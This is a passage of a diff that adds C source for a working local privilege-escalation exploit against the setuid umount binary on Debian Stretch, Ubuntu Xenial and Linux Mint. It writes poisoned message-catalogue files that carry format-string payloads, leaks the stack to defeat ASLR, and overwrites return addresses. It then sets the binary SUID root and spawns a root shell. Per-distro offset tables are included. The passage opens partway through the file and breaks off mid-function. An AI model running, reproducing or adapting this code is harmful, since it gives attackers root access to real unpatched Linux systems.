+    "Content-Type: text/plain; charset=UTF-8\n"
+    "Content-Transfer-Encoding: 8bit\n";
+
+/** The pid of a namespace process with the working directory
+ *  at a writable /tmp only visible by the process. */
+pid_t namespacedProcessPid=-1;
+
+int killNamespacedProcessFlag=1;
+
+/** The pathname to the umount binary to execute. */
+char *umountPathname;
+
+/** The pathname to the named pipe, that will synchronize umount
+ *  binary with supervisory process before triggering the second
+ *  and last exploitation phase.
+ */
+char *secondPhaseTriggerPipePathname;
+
+/** The pathname to the second phase exploitation catalogue file.
+ *  This is needed as the catalogue cannot be sent via the trigger
+ *  pipe from above.
+ */
+char *secondPhaseCataloguePathname;
+
+/** The OS-release detected via /etc/os-release. */
+char *osRelease=NULL;
+
+/** This table contains all relevant information to adapt the
+ *  attack to supported Linux distros (fully updated) to support
+ *  also older versions, hash of umount/libc/libmount should be
+ *  used also for lookups.
+ *  The 4th string is an array of 4-byte integers with the offset
+ *  values for format string generation. Values specify:
+ *  * Stack position (in 8 byte words) for **argv
+ *  * Stack position of argv[0]
+ *  * Offset from __libc_start_main return position from main()
+ *    and system() function, first instruction after last sigprocmask()
+ *    before execve call.
+ */
+#define ED_STACK_OFFSET_CTX 0
+#define ED_STACK_OFFSET_ARGV 1
+#define ED_STACK_OFFSET_ARG0 2
+#define ED_LIBC_GETDATE_DELTA 3
+#define ED_LIBC_EXECL_DELTA 4
+static char* osSpecificExploitDataList[]={
+// Debian Stretch
+    "\"9 (stretch)\"",
+    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
+    "from_archive",
+// Delta for Debian Stretch "2.24-11+deb9u1"
+    "\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
+// Ubuntu Xenial libc=2.23-0ubuntu9
+    "\"16.04.3 LTS (Xenial Xerus)\"",
+    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
+    "_nl_load_locale_from_archive",
+    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
+// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
+    "\"18.3 (Sylvia)\"",
+    "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
+    "_nl_load_locale_from_archive",
+    "\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
+    NULL};
+
+char **osReleaseExploitData=NULL;
+
+/** Locate the umount binary within the given search path list,
+ *  elements separated by colons.
+ *  @return a pointer to a malloced memory region containing the
+ *  string or NULL if not found.
+ */
+char* findUmountBinaryPathname(char *searchPath) {
+  char *testPathName=(char*)malloc(PATH_MAX);
+  assert(testPathName);
+
+  while(*searchPath) {
+    char *endPtr=strchr(searchPath, ':');
+    int length=endPtr-searchPath;
+    if(!endPtr) {
+      length=strlen(searchPath);
+      endPtr=searchPath+length-1;
+    }
+    int result=snprintf(testPathName, PATH_MAX, "%.*s/%s", length,
+        searchPath, "umount");
+    if(result>=PATH_MAX) {
+      fprintf(stderr, "Binary search path element too long, ignoring it.\n");
+    } else {
+      struct stat statBuf;
+      result=stat(testPathName, &statBuf);
+// Just assume, that umount is owner-executable. There might be
+// alternative ACLs, which grant umount execution only to selected
+// groups, but it would be unusual to have different variants
+// of umount located searchpath on the same host.
+      if((!result)&&(S_ISREG(statBuf.st_mode))&&(statBuf.st_mode&S_IXUSR)) {
+        return(testPathName);
+      }
+    }
+    searchPath=endPtr+1;
+  }
+
+  free(testPathName);
+  return(NULL);
+}
+
+
+/** Get the value for a given field name.
+ *  @return NULL if not found, a malloced string otherwise.
+ */
+char* getReleaseFileField(char *releaseData, int dataLength, char *fieldName) {
+  int nameLength=strlen(fieldName);
+  while(dataLength>0) {
+    char *nextPos=memchr(releaseData, '\n', dataLength);
+    int lineLength=dataLength;
+    if(nextPos) {
+      lineLength=nextPos-releaseData;
+      nextPos++;
+    } else {
+      nextPos=releaseData+dataLength;
+    }
+    if((!strncmp(releaseData, fieldName, nameLength))&&
+        (releaseData[nameLength]=='=')) {
+      return(strndup(releaseData+nameLength+1, lineLength-nameLength-1));
+    }
+    releaseData=nextPos;
+    dataLength-=lineLength;
+  }
+  return(NULL);
+}
+
+
+/** Detect the release by reading the VERSION field from /etc/os-release.
+ *  @return 0 on success.
+ */
+int detectOsRelease() {
+  int handle=open("/etc/os-release", O_RDONLY);
+  if(handle<0)
+    return(-1);
+
+  char *buffer=alloca(1024);
+  int infoLength=read(handle, buffer, 1024);
+  close(handle);
+  if(infoLength<0)
+    return(-1);
+  osRelease=getReleaseFileField(buffer, infoLength, "VERSION");
+  if(!osRelease)
+    osRelease=getReleaseFileField(buffer, infoLength, "NAME");
+  if(osRelease) {
+    fprintf(stderr, "Detected OS version: %s\n", osRelease);
+    return(0);
+  }
+
+  return(-1);
+}
+
+
+/** Create the catalogue data in memory.
+ *  @return a pointer to newly allocated catalogue data memory
+ */
+char* createMessageCatalogueData(char **origStringList, char **transStringList,
+    int stringCount, int *catalogueDataLength) {
+  int contentLength=strlen(messageCataloguePreamble)+2;
+  for(int stringPos=0; stringPos<stringCount; stringPos++) {
+    contentLength+=strlen(origStringList[stringPos])+
+        strlen(transStringList[stringPos])+2;
+  }
+  int preambleLength=(0x1c+0x14*(stringCount+1)+0xc)&-0xf;
+  char *catalogueData=(char*)malloc(preambleLength+contentLength);
+  memset(catalogueData, 0, preambleLength);
+  int *preambleData=(int*)catalogueData;
+  *preambleData++=0x950412de;
+  preambleData++;
+  *preambleData++=stringCount+1;
+  *preambleData++=0x1c;
+  *preambleData++=(*(preambleData-2))+(stringCount+1)*sizeof(int)*2;
+  *preambleData++=0x5;
+  *preambleData++=(*(preambleData-3))+(stringCount+1)*sizeof(int)*2;
+
+  char *nextCatalogueStringStart=catalogueData+preambleLength;
+  for(int stringPos=-1; stringPos<stringCount; stringPos++) {
+    char *writeString=(stringPos<0)?"":origStringList[stringPos];
+    int length=strlen(writeString);
+    *preambleData++=length;
+    *preambleData++=(nextCatalogueStringStart-catalogueData);
+    memcpy(nextCatalogueStringStart, writeString, length+1);
+    nextCatalogueStringStart+=length+1;
+  }
+  for(int stringPos=-1; stringPos<stringCount; stringPos++) {
+    char *writeString=(stringPos<0)?messageCataloguePreamble:transStringList[stringPos];
+    int length=strlen(writeString);
+    *preambleData++=length;
+    *preambleData++=(nextCatalogueStringStart-catalogueData);
+    memcpy(nextCatalogueStringStart, writeString, length+1);
+    nextCatalogueStringStart+=length+1;
+  }
+  assert(nextCatalogueStringStart-catalogueData==preambleLength+contentLength);
+  for(int stringPos=0; stringPos<=stringCount+1; stringPos++) {
+//    *preambleData++=(stringPos+1);
+    *preambleData++=(int[]){1, 3, 2, 0, 4}[stringPos];
+  }
+  *catalogueDataLength=preambleLength+contentLength;
+  return(catalogueData);
+}
+
+
+/** Create the catalogue data from the string lists and write
+ *  it to the given file.
+ *  @return 0 on success.
+ */
+int writeMessageCatalogue(char *pathName, char **origStringList,
+    char **transStringList, int stringCount) {
+  int catalogueFd=open(pathName, O_WRONLY|O_CREAT|O_TRUNC|O_NOCTTY, 0644);
+  if(catalogueFd<0) {
+    fprintf(stderr, "Failed to open catalogue file %s for writing.\n",
+        pathName);
+    return(-1);
+  }
+  int catalogueDataLength;
+  char *catalogueData=createMessageCatalogueData(
+      origStringList, transStringList, stringCount, &catalogueDataLength);
+  int result=write(catalogueFd, catalogueData, catalogueDataLength);
+  assert(result==catalogueDataLength);
+  close(catalogueFd);
+  free(catalogueData);
+  return(0);
+}
+
+void createDirectoryRecursive(char *namespaceMountBaseDir, char *pathName) {
+  char pathBuffer[PATH_MAX];
+  int pathNameLength=0;
+  while(1) {
+    char *nextPathSep=strchr(pathName+pathNameLength, '/');
+    if(nextPathSep) {
+      pathNameLength=nextPathSep-pathName;
+    } else {
+      pathNameLength=strlen(pathName);
+    }
+    int result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/%.*s",
+        namespaceMountBaseDir, pathNameLength, pathName);
+    assert(result<PATH_MAX);
+    result=mkdir(pathBuffer, 0755);
+    assert((!result)||(errno==EEXIST));
+    if(!pathName[pathNameLength])
+      break;
+    pathNameLength++;
+  }
+}
+
+
+/** This child function prepares the namespaced mount point and
+ *  then waits to be killed later on.
+ */
+static int usernsChildFunction() {
+  while(geteuid()!=0) {
+    sched_yield();
+  }
+  int result=mount("tmpfs", "/tmp", "tmpfs", MS_MGC_VAL, NULL);
+  assert(!result);
+  assert(!chdir("/tmp"));
+  int handle=open("ready", O_WRONLY|O_CREAT|O_EXCL|O_NOFOLLOW|O_NOCTTY, 0644);
+  assert(handle>=0);
+  close(handle);
+  sleep(100000);
+}
+
+/** Prepare a process living in an own mount namespace and setup
+ *  the mount structure appropriately. The process is created
+ *  in a way allowing cleanup at program end by just killing it,
+ *  thus removing the namespace.
+ *  @return the pid of that process or -1 on error.
+ */
+pid_t prepareNamespacedProcess() {
+  if(namespacedProcessPid==-1) {
+    fprintf(stderr, "No pid supplied via command line, trying to create a namespace\nCAVEAT: /proc/sys/kernel/unprivileged_userns_clone must be 1 on systems with USERNS protection.\n");
+
+    char *stackData=(char*)malloc(1<<20);
+    assert(stackData);
+    namespacedProcessPid=clone(usernsChildFunction, stackData+(1<<20),
+        CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, NULL);
+    if(namespacedProcessPid==-1) {
+      fprintf(stderr, "USERNS clone failed: %d (%s)\n", errno, strerror(errno));
+      return(-1);
+    }
+
+    char idMapFileName[128];
+    char idMapData[128];
+    sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
+    int setGroupsFd=open(idMapFileName, O_WRONLY);
+    assert(setGroupsFd>=0);
+    int result=write(setGroupsFd, "deny", 4);
+    assert(result>0);
+    close(setGroupsFd);
+
+    sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
+    int uidMapFd=open(idMapFileName, O_WRONLY);
+    assert(uidMapFd>=0);
+    sprintf(idMapData, "0 %d 1\n", getuid());
+    result=write(uidMapFd, idMapData, strlen(idMapData));
+    assert(result>0);
+    close(uidMapFd);
+
+    sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
+    int gidMapFd=open(idMapFileName, O_WRONLY);
+    assert(gidMapFd>=0);
+    sprintf(idMapData, "0 %d 1\n", getgid());
+    result=write(gidMapFd, idMapData, strlen(idMapData));
+    assert(result>0);
+    close(gidMapFd);
+
+// After setting the maps for the child process, the child may
+// start setting up the mount point. Wait for that to complete.
+    sleep(1);
+    fprintf(stderr, "Namespaced filesystem created with pid %d\n",
+        namespacedProcessPid);
+  }
+
+  osReleaseExploitData=osSpecificExploitDataList;
+  if(osRelease) {
+// If an OS was detected, try to find it in list. Otherwise use
+// default.
+    for(int tPos=0; osSpecificExploitDataList[tPos]; tPos+=4) {
+      if(!strcmp(osSpecificExploitDataList[tPos], osRelease)) {
+        osReleaseExploitData=osSpecificExploitDataList+tPos;
+        break;
+      }
+    }
+  }
+
+  char pathBuffer[PATH_MAX];
+  int result=snprintf(pathBuffer, sizeof(pathBuffer), "/proc/%d/cwd",
+     namespacedProcessPid);
+  assert(result<PATH_MAX);
+  char *namespaceMountBaseDir=strdup(pathBuffer);
+  assert(namespaceMountBaseDir);
+
+// Create directories needed for umount to proceed to final state
+// "not mounted".
+  createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
+  assert(result<PATH_MAX);
+  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
+  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
+  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
+
+// Create symlink to trigger underflows.
+  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
+      namespaceMountBaseDir);
+  assert(result<PATH_MAX);
+  result=symlink(osReleaseExploitData[1], pathBuffer);
+  assert(!result||(errno==EEXIST));
+
+// getdate will leave that string in rdi to become the filename
+// to execute for the next round.
+  char *selfPathName=realpath("/proc/self/exe", NULL);
+  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
+      namespaceMountBaseDir);
+  assert(result<PATH_MAX);
+  int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
+  assert(handle>0);
+  result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
+      selfPathName);
+  assert(result<PATH_MAX);
+  result=write(handle, pathBuffer, result);
+  close(handle);
+  free(selfPathName);
+
+// Write the initial message catalogue to trigger stack dumping
+// and to make the "umount" call privileged by toggling the "restricted"
+// flag in the context.
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
+      namespaceMountBaseDir, osReleaseExploitData[2]);
+  assert(result<PATH_MAX);
+
+  char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
+  assert(stackDumpStr);
+  char *stackDumpStrEnd=stackDumpStr;
+  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
+      ((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
+  for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
+    memcpy(stackDumpStrEnd, "%016lx", 6);
+    stackDumpStrEnd+=6;
+  }
+// We wrote allready 8 bytes, write so many more to produce a
+// count of 'L' and write that to the stack. As all writes so
+// sum up to a count aligned by 8, and 'L'==0x4c, we will have
+// to write at least 4 bytes, which is longer than any "%hhx"
+// format string output. Hence do not care about the byte content
+// here. The target write address has a 16 byte alignment due
+// to varg structure.
+  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
+      ('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
+      STACK_LONG_DUMP_BYTES/16);
+  *stackDumpStrEnd=0;
+  result=writeMessageCatalogue(pathBuffer,
+      (char*[]){
+          "%s: mountpoint not found",
+          "%s: not mounted",
+          "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
+      },
+      (char*[]){"1234", stackDumpStr, "5678"},
+      3);
+  assert(!result);
+  free(stackDumpStr);
+
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
+      namespaceMountBaseDir, osReleaseExploitData[2]);
+  assert(result<PATH_MAX);
+  result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
+  assert((!result)||(errno==EEXIST));
+  secondPhaseTriggerPipePathname=strdup(pathBuffer);
+
+  result=snprintf(pathBuffer, sizeof(pathBuffer),
+      "%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
+      namespaceMountBaseDir, osReleaseExploitData[2]);
+  secondPhaseCataloguePathname=strdup(pathBuffer);
+
+  free(namespaceMountBaseDir);
+  return(namespacedProcessPid);
+}
+
+
+
+/** Create the format string to write an arbitrary value to the
+ *  stack. The created format string avoids to interfere with
+ *  the complex fprintf format handling logic by accessing fprintf
+ *  internal state on stack. Thus the modification method does
+ *  not depend on that ftp internals. The current libc fprintf
+ *  implementation copies values for formatting before applying
+ *  the %n writes, therefore pointers changed by fprintf operation
+ *  can only be utilized with the next fprintf invocation. As
+ *  we cannot rely on a stack having a suitable number of pointers
+ *  ready for arbitrary writes, we need to create those pointers
+ *  one by one. Everything needed is pointer on stack pointing
+ *  to another valid pointer and 4 helper pointers pointing to
+ *  writeable memory. The **argv list matches all those requirements.
+ *  @param printfArgvValuePos the position of the argv pointer from
+ *  printf format string view.
+ *  @param argvStackAddress the address of the argv list, where
+ *  the argv[0] pointer can be read.
+ *  @param printfArg0ValuePos the position of argv list containing
+ *  argv[0..n] pointers.
+ *  @param mainFunctionReturnAddress the address on stack where
+ *  the return address from the main() function to _libc_start()
+ *  is stored.
+ *  @param writeValue the value to write to mainFunctionReturnAddress
+ */
+void createStackWriteFormatString(
+    char *formatBuffer, int bufferSize, int printfArgvValuePos,
+    void *argvStackAddress, int printfArg0ValuePos,
+    void *mainFunctionReturnAddress, unsigned short *writeData,
+    int writeDataLength) {
+  int result=0;
+  int currentValue=-1;
+  for(int nextWriteValue=0; nextWriteValue<0x10000;) {
+// Find the lowest value to write.
+    nextWriteValue=0x10000;
+    for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
+       int value=writeData[valuePos];
+       if((value>currentValue)&&(value<nextWriteValue))
+         nextWriteValue=value;
+    }
+    if(currentValue<0)
+      currentValue=0;
+    if(currentValue!=nextWriteValue) {
+      result=snprintf(formatBuffer, bufferSize, "%%1$%1$d.%1$ds",
+          nextWriteValue-currentValue);
+      formatBuffer+=result;
+      bufferSize-=result;
+      currentValue=nextWriteValue;
+    }
+    for(int valuePos=0; valuePos<writeDataLength; valuePos++) {
+       if(writeData[valuePos]==nextWriteValue) {
+          result=snprintf(formatBuffer, bufferSize,
+              "%%%d$hn", printfArg0ValuePos+valuePos+1);
+          formatBuffer+=result;
+          bufferSize-=result;
+       }
+    }
+  }
+
+// Print the return function address location number of bytes
+// except 8 (those from the LABEL counter) and write the value
+// to arg1.
+  int writeCount=((int)mainFunctionReturnAddress-18)&0xffff;
+  result=snprintf(formatBuffer, bufferSize,
+      "%%1$%d.%ds%%1$s%%1$s%%%d$hn",
+      writeCount, writeCount, printfArg0ValuePos);
+  formatBuffer+=result;
+  bufferSize-=result;
+
+// Write the LABEL 6 more times, thus multiplying the the single
+// byte write pointer to an 8-byte aligned argv-list pointer and
+// update argv[0] to point to argv[1..n].
+  writeCount=(((int)argvStackAddress)-(writeCount+56))&0xffff;
+  result=snprintf(formatBuffer, bufferSize,
+      "%%1$s%%1$s%%1$s%%1$s%%1$s%%1$s%%1$%d.%ds%%%d$hn",
+      writeCount, writeCount, printfArgvValuePos);
+  formatBuffer+=result;
+  bufferSize-=result;
+
+// Append a debugging preamble.
+  result=snprintf(formatBuffer, bufferSize, "-%%35$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%%d$lx-%%78$s\n",
+      printfArgvValuePos, printfArg0ValuePos-1, printfArg0ValuePos,
+      printfArg0ValuePos+1, printfArg0ValuePos+2, printfArg0ValuePos+3,
+      printfArg0ValuePos+4, printfArg0ValuePos+5, printfArg0ValuePos+6);
+  formatBuffer+=result;
+  bufferSize-=result;
+}
+
+
+/** Wait for the trigger pipe to open. The pipe will be closed
+ *  immediately after opening it.
+ *  @return 0 when the pipe was opened before hitting a timeout.
+ */
+int waitForTriggerPipeOpen(char *pipeName) {
+  struct timespec startTime, currentTime;
+  int result=clock_gettime(CLOCK_MONOTONIC, &startTime);
+  startTime.tv_sec+=10;
+  assert(!result);
+  while(1) {
+    int pipeFd=open(pipeName, O_WRONLY|O_NONBLOCK);
+    if(pipeFd>=0) {
+      close(pipeFd);
+      break;
+    }
+    result=clock_gettime(CLOCK_MONOTONIC, &currentTime);
+    if(currentTime.tv_sec>startTime.tv_sec) {
+      return(-1);
+    }
+    currentTime.tv_sec=0;
+    currentTime.tv_nsec=100000000;
+    nanosleep(&currentTime, NULL);
+  }
+  return(0);
+}
+
+
+/** Invoke umount to gain root privileges.
+ *  @return 0 if the umount process terminated with expected exit
+ *  status.
+ */
+int attemptEscalation() {
+  int escalationSuccess=-1;
+
+  char targetCwd[64];
+  snprintf(
+      targetCwd, sizeof(targetCwd)-1, "/proc/%d/cwd", namespacedProcessPid);
+
+  int pipeFds[2];
+  int result=pipe(pipeFds);
+  assert(!result);
+
+  pid_t childPid=fork();
+  assert(childPid>=0);
+  if(!childPid) {
+// This is the child process.
+    close(pipeFds[0]);
+    fprintf(stderr, "Starting subprocess\n");
+    dup2(pipeFds[1], 1);
+    dup2(pipeFds[1], 2);
+    close(pipeFds[1]);
+    result=chdir(targetCwd);
+    assert(!result);
+
+// Create so many environment variables for a kind of "stack spraying".
+    int envCount=UMOUNT_ENV_VAR_COUNT;
+    char **umountEnv=(char**)malloc((envCount+1)*sizeof(char*));
+    assert(umountEnv);
+    umountEnv[envCount--]=NULL;
+    umountEnv[envCount--]="LC_ALL=C.UTF-8";
+    while(envCount>=0) {
+      umountEnv[envCount--]="AANGUAGE=X.X";
+    }
+// Use the built-in C locale.
+// Invoke umount first by overwriting heap downwards using links
+// for "down", then retriggering another error message ("busy")
+// with hopefully similar same stack layout for other path "/".
+    char* umountArgs[]={umountPathname, "/", "/", "/", "/", "/", "/", "/", "/", "/", "/", "down", "LABEL=78", "LABEL=789", "LABEL=789a", "LABEL=789ab", "LABEL=789abc", "LABEL=789abcd", "LABEL=789abcde", "LABEL=789abcdef", "LABEL=789abcdef0", "LABEL=789abcdef0", NULL};
+    result=execve(umountArgs[0], umountArgs, umountEnv);
+    assert(!result);
+  }
+  close(pipeFds[1]);
+  int childStdout=pipeFds[0];
+
+  int escalationPhase=0;
+  char readBuffer[1024];
+  int readDataLength=0;
+  char stackData[STACK_LONG_DUMP_BYTES];
+  int stackDataBytes=0;
+
+  struct pollfd pollFdList[1];
+  pollFdList[0].fd=childStdout;
+  pollFdList[0].events=POLLIN;
+
+// Now learn about the binary, prepare data for second exploitation
+// phase. The phases should be:
+// * 0: umount executes, glibc underflows and causes an util-linux.mo
+//   file to be read, that contains a poisonous format string.
+//   Successful poisoning results in writing of 8*'A' preamble,
+//   we are looking for to indicate end of this phase.
+// * 1: The poisoned process writes out stack content to defeat
+//   ASLR. Reading all relevant stack end this phase.
+// * 2: The poisoned process changes the "LANGUAGE" parameter,
+//   thus triggering re-read of util-linux.mo. To avoid races,
+//   we let umount open a named pipe, thus blocking execution.
+//   As soon as the pipe is ready for writing, we write a modified
+//   version of util-linux.mo to another file because the pipe
+//   cannot be used for sending the content.
+// * 3: We read umount output to avoid blocking the process and
+//   wait for it to ROP execute fchown/fchmod and exit.
+  while(1) {
+    if(escalationPhase==2) {
+// We cannot use the standard poll from below to monitor the pipe,
+// but also we do not want to block forever. Wait for the pipe
+// in nonblocking mode and then continue with next phase.
+      result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
+      if(result) {
+        goto attemptEscalationCleanup;
+      }
+      escalationPhase++;
+    }
+
+// Wait at most 10 seconds for IO.
+    result=poll(pollFdList, 1, 10000);
+    if(!result) {
+// We ran into a timeout. This might be the result of a deadlocked
+// child, so kill the child and retry.
+      fprintf(stderr, "Poll timed out\n");
+      goto attemptEscalationCleanup;
+    }
+// Perform the IO operations without blocking.
+    if(pollFdList[0].revents&(POLLIN|POLLHUP)) {
+      result=read(
+          pollFdList[0].fd, readBuffer+readDataLength,
+          sizeof(readBuffer)-readDataLength);
+      if(!result) {
+        if(escalationPhase<3) {
+// Child has closed the socket unexpectedly.
+          goto attemptEscalationCleanup;
+        }
+        break;
+      }
+      if(result<0) {
+        fprintf(stderr, "IO error talking to child\n");
+        goto attemptEscalationCleanup;
+      }
+      readDataLength+=result;
+
+// Handle the data depending on escalation phase.
+      int moveLength=0;
+      switch(escalationPhase) {
+        case 0: // Initial sync: read A*8 preamble.
+          if(readDataLength<8)
+            continue;
+          char *preambleStart=memmem(readBuffer, readDataLength,
+              "AAAAAAAA", 8);
+          if(!preambleStart) {
+// No preamble, move content only if buffer is full.
+            if(readDataLength==sizeof(readBuffer))
+              moveLength=readDataLength-7;
+            break;
+          }
+// We found, what we are looking for. Start reading the stack.
+          escalationPhase++;
+          moveLength=preambleStart-readBuffer+8;
+        case 1: // Read the stack.
+// Consume stack data until or local array is full.
+          while(moveLength+16<=readDataLength) {
+            result=sscanf(readBuffer+moveLength, "%016lx",
+                (int*)(stackData+stackDataBytes));
+            if(result!=1) {
+// Scanning failed, the data injection procedure apparently did
+// not work, so this escalation failed.
+              goto attemptEscalationCleanup;
+            }
+            moveLength+=sizeof(long)*2;
+            stackDataBytes+=sizeof(long);
+// See if we reached end of stack dump already.
+            if(stackDataBytes==sizeof(stackData))
+              break;
+          }
+          if(stackDataBytes!=sizeof(stackData))
+            break;
+
+// All data read, use it to prepare the content for the next phase.
+          fprintf(stderr, "Stack content received, calculating next phase\n");
+
+          int *exploitOffsets=(int*)osReleaseExploitData[3];
+
+// This is the address, where source Pointer is pointing to.
+          void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
+// This is the stack address source for the target pointer.
+          void *sourcePointerLocation=sourcePointerTarget-0xd0;
+
+          void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
+// This is the stack address of the libc start function return
+// pointer.
+          void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
+          fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
+              sourcePointerLocation, sourcePointerTarget,
+              targetPointerTarget, libcStartFunctionReturnAddressSource);
+// So the libcStartFunctionReturnAddressSource is the lowest address
+// to manipulate, targetPointerTarget+...
+
+          void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
+          void *stackWriteData[]={
+              libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
+              libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
+          };
+          fprintf(stderr, "Changing return address from %p to %p, %p\n",
+              libcStartFunctionAddress, stackWriteData[0],
+              stackWriteData[1]);
+          escalationPhase++;
+
+          char *escalationString=(char*)malloc(1024);
+          createStackWriteFormatString(
+              escalationString, 1024,
+              exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
+              sourcePointerTarget, // Base value to write
+              exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
+              libcStartFunctionReturnAddressSource,
+              (unsigned short*)stackWriteData,
+              sizeof(stackWriteData)/sizeof(unsigned short)
+          );
+          fprintf(stderr, "Using escalation string %s", escalationString);
+
+          result=writeMessageCatalogue(
+              secondPhaseCataloguePathname,
+              (char*[]){
+                  "%s: mountpoint not found",
+                  "%s: not mounted",
+                  "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
+              },
+              (char*[]){
+                  escalationString,
+                  "BBBB5678%3$s\n",
+                  "BBBBABCD%s\n"},
+              3);
+          assert(!result);
+          break;
+        case 2:
+        case 3:
+// Wait for pipe connection and output any result from mount.
+          readDataLength=0;
+          break;
+        default:
+          fprintf(stderr, "Logic error, state %d\n", escalationPhase);
+          goto attemptEscalationCleanup;
+      }
+      if(moveLength) {
+        memmove(readBuffer, readBuffer+moveLength, readDataLength-moveLength);
+        readDataLength-=moveLength;
+      }
+    }
+  }
+
+attemptEscalationCleanup:
+// Wait some time to avoid killing umount even when exploit was
+// successful.
+  sleep(1);
+  close(childStdout);
+// It is safe to kill the child as we did not wait for it to finish
+// yet, so at least the zombie process is still here.
+  kill(childPid, SIGKILL);
+  pid_t waitedPid=waitpid(childPid, NULL, 0);
+  assert(waitedPid==childPid);
+
+  return(escalationSuccess);
+}
+
+
+/** This function invokes the shell specified via environment
+ *  or the default shell "/bin/sh" when undefined. The function
+ *  does not return on success.
+ *  @return -1 on error
+ */
+int invokeShell(char *shellName) {
+  if(!shellName)
+    shellName=getenv("SHELL");
+  if(!shellName)
+    shellName="/bin/sh";
+  char* shellArgs[]={shellName, NULL};
+  execve(shellName, shellArgs, environ);
+  fprintf(stderr, "Failed to launch shell %s\n", shellName);
+  return(-1);
+}
+
+int main(int argc, char **argv) {
+  char *programmName=argv[0];
+  int exitStatus=1;
+
+  if(getuid()==0) {
+    fprintf(stderr, "%s: you are already root, invoking shell ...\n",
+        programmName);
+    invokeShell(NULL);
+    return(1);
+  }
+
+  if(geteuid()==0) {
+    struct stat statBuf;
+    int result=stat("/proc/self/exe", &statBuf);
+    assert(!result);
+    if(statBuf.st_uid||statBuf.st_gid) {
+      fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
+          programmName);
+      int handle=open("/proc/self/exe", O_RDONLY);
+      fchown(handle, 0, 0);
+      fchmod(handle, 04755);
+      exit(0);
+    }
+
+    fprintf(stderr, "%s: invoked as SUID, invoking shell ...\n",
+        programmName);
+    setresgid(0, 0, 0);
+    setresuid(0, 0, 0);
+    invokeShell(NULL);
+    return(1);
+  }
+
+  for(int argPos=1; argPos<argc;) {
+    char *argName=argv[argPos++];
+    if(argPos==argc) {
+      fprintf(stderr, "%s requires parameter\n", argName);
+      return(1);
+    }
+    if(!strcmp("--Pid", argName)) {
+      char *endPtr;
+      namespacedProcessPid=strtoll(argv[argPos++], &endPtr, 10);
+      if((errno)||(*endPtr)) {
+        fprintf(stderr, "Invalid pid value\n");
+        return(1);
+      }
+      killNamespacedProcessFlag=0;
+    } else {
